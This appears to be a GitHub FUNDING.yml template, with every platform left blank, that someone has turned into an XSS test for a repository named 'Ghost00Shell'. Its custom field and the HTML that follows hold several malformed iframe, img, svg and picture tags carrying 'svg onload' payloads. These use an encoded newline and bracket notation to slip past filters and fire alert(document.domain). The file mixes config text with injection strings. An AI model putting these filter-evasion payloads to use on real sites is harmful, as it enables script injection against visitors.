# These are supported funding model platforms

github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
patreon: # Replace with a single Patreon username
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
Welcome to the Ghost00Shell wiki!
custom: <iframe  src="(g)[<img src=(g.png)[<svg%0donload="window[%27alert%27]"(document.domain)(g.png)]"></iframe>

<figure class="video_container">
<iframe src="(g.png)[<svg%0donload="window[%27alert%27]"(document.domain)(g.png)]"></iframe>
</figure>
<img src=(g.png)[<svg%0donload="window[%27alert%27]"(document.domain)(g.png)]">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="(g.png)[<svg%0donload="window[%27alert%27]"(document.domain)(g.png)]">
  <img alt="/(g)[<img src=g>"><svg%0donload="window[%27alert%27]"(document.domain)>]/" src="(g)[<<img src=g>"[<svg%0donload="window[%27alert%27]"(document.domain)(g.png)>].png">
</picture>
